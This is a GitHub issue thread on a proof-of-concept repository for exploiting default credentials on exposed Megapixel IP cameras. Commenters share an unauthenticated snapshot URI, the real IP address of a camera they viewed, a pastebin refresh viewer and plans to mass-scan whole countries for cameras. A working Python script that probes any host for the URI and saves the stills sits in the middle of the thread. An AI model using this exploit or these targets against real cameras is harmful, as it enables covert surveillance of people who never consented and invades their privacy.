BoomSec / Megapixel-IP-Camera-POC

This is a proof of concept script I put together that exploits the default credentials of exposed Megapixel IP Cameras.
MIT License

fyi: auth-bypass for image / pseudo moving image #1

Closed mcbazza closed 9 months ago

mcbazza commented 9 months ago

Hey there. Found you via Shodan+OSINT ;-)

Just an FYI: once you come up against these cams, there's a URI that gives a static image via non-auth, as long as the cam is exposed via HTTP (any port), e.g. https://www.shodan.io/host/82.64.91.107. Shodan has the static image on 80/tcp and 554/tcp (same image). We can obviously get full moving image+audio via 554/tcp (RTSP). But what about when 554/tcp isn't available?

If we were to go to: hxxp://82.64.91.107/jpgmulreq/1/image.jpg?key=&lq=12 (URI defanged to prevent auto-linking, change to http for it to work) We get a single static image. Press F5 to refresh. Or, craft a little local .html that pulls that image in, and some .js to refresh it every 500ms.

For an example of that, see: https://pastebin.com/raw/Qsej1DbP (change the IP+port accordingly. Or view as-is to see guards at a desk in RU ;-) )

Feel free to find+add me on Twitter/X, if you have an account there.

BoomSec commented 9 months ago

Hey boss! That is a great idea! I am now in the trial and error process of putting together a "viewer" of sorts that allows users to view the live footage from the cameras they have exfiltrated the IPs of.

In the interim I have added a couple of lines of code that use that jpgmulreq syntax to pull an image after the success code and store it to a PNG called ip port_image.png.

I was going to shoot a msg over to you on twt but you have dms closed. We should discuss optimising and improving this further. :D
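Worked example covering the unauthenticated `/jpgmulreq/1/image.jpg?key=&lq=12` URI from the issue and the "grab a still after the success code and save it as ip port_image" behaviour described in the reply. This is added example code, not the repo's own script or either commenter's code. Assumptions not taken from the thread: the camera answers that URI with a raw JPEG body (validated by the `FF D8 FF` start-of-image marker, so an HTML login page returned with HTTP 200 is not mistaken for a bypass), the fetcher is injectable so the logic runs offline against a constructed reply, the `_=` cache-busting query parameter is hypothetical, and the file is written with a `.jpg` extension because the body is a JPEG.

```python
"""Added example (not the repo's own script): probe the unauthenticated
snapshot URI from the issue and save the still as <ip>_<port>_image.jpg.

Assumptions not taken from the thread: the camera answers the URI with a raw
JPEG body (checked via the FF D8 FF start-of-image marker), and the HTTP
fetcher is injectable so the logic runs offline against a constructed reply.
"""
import sys
import urllib.error
import urllib.request
from pathlib import Path
from typing import Callable, Optional, Tuple

# URI quoted in the issue; "key=" is left empty on purpose (no credential).
SNAPSHOT_PATH = "/jpgmulreq/1/image.jpg?key=&lq=12"
JPEG_SOI = b"\xff\xd8\xff"  # JPEG start-of-image marker

Fetcher = Callable[[str], Tuple[int, bytes]]  # url -> (HTTP status, body)


def snapshot_url(host: str, port: int = 80, cache_bust: Optional[int] = None) -> str:
    """Build the snapshot URL. cache_bust is a hypothetical extra query
    parameter so a refreshing viewer never gets a cached frame."""
    url = f"http://{host}:{port}{SNAPSHOT_PATH}"
    if cache_bust is not None:
        url += f"&_={cache_bust}"
    return url


def http_fetch(url: str, timeout: float = 5.0) -> Tuple[int, bytes]:
    """Real fetcher: plain GET, no credentials, returns the status even on 4xx."""
    req = urllib.request.Request(url, headers={"User-Agent": "snapshot-probe"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def probe_snapshot(host: str, port: int = 80, fetch: Fetcher = http_fetch) -> Optional[bytes]:
    """Return the JPEG bytes if the camera serves a still with no auth,
    else None (401/403, or a 200 that is really an HTML login page)."""
    status, body = fetch(snapshot_url(host, port))
    if status != 200 or not body.startswith(JPEG_SOI):
        return None
    return body


def save_snapshot(host: str, port: int, body: bytes, out_dir: str = ".") -> Path:
    """Write the still using the <ip>_<port>_image naming from the issue;
    the extension is .jpg because the body is a JPEG, not a PNG."""
    path = Path(out_dir) / f"{host}_{port}_image.jpg"
    path.write_bytes(body)
    return path


# Constructed reply standing in for an exposed camera, for offline use.
_CONSTRUCTED_JPEG = JPEG_SOI + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 32


def fake_camera(url: str) -> Tuple[int, bytes]:
    """Offline stand-in: only the exact snapshot path is unauthenticated."""
    if url.split("?", 1)[0].endswith("/jpgmulreq/1/image.jpg"):
        return 200, _CONSTRUCTED_JPEG
    return 401, b"<html>login</html>"


if __name__ == "__main__":
    if len(sys.argv) >= 2:  # python3 probe.py <host> [port]
        host = sys.argv[1]
        port = int(sys.argv[2]) if len(sys.argv) > 2 else 80
        fetch = http_fetch
    else:  # no target given: run against the constructed camera (TEST-NET address)
        host, port, fetch = "192.0.2.10", 80, fake_camera
    still = probe_snapshot(host, port, fetch)
    if still is None:
        print(f"{host}:{port}: snapshot requires auth or is not a JPEG")
    else:
        print(f"{host}:{port}: saved {save_snapshot(host, port, still)}")
```

Run it with no arguments to exercise the constructed camera, or `python3 probe.py <host> [port]` against a real one. The magic-byte check is the part worth keeping: many of these web interfaces answer an unauthenticated request with a 200 and a login page, so checking only the status code over-reports the bypass.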

BoomSec commented 9 months ago

Pushed an update to include the image grabber in some aspect. I need to improve my "changelog" skills but it will be right for now

mcbazza commented 9 months ago

No problem. If you @ me on there, I'll follow you, then you/we can DM.

btw: I have a cam scanner that's specific to 554/tcp😉. It's in my repo in 'main'. It'll find the cams with 554/tcp exposed, and if the cam is a cheap shjtty IP cam that's exposed via UPnP, it'll try to scan the web i/f and display some useful info that may be found there.

There's another version in the 'capture-images' branch that spawns a .py to then capture a still and save it.

And there's a version that's not yet public that uses masscan to let you scan an entire country, and capture images from all 554/tcp's that it finds.

Anyway. Enough of me spamming your repo. Feel free to close this. And I'll catch you via other means another time.

oh. btw: checkout 'rtspbrute' 😉

B


BoomSec commented 9 months ago

Yooo, I finally pushed out the interface. Tried to host it using github.io, but pulling images over HTTP on an HTTPS-hosted site does not go well, so I just put the code for the interface on the main branch.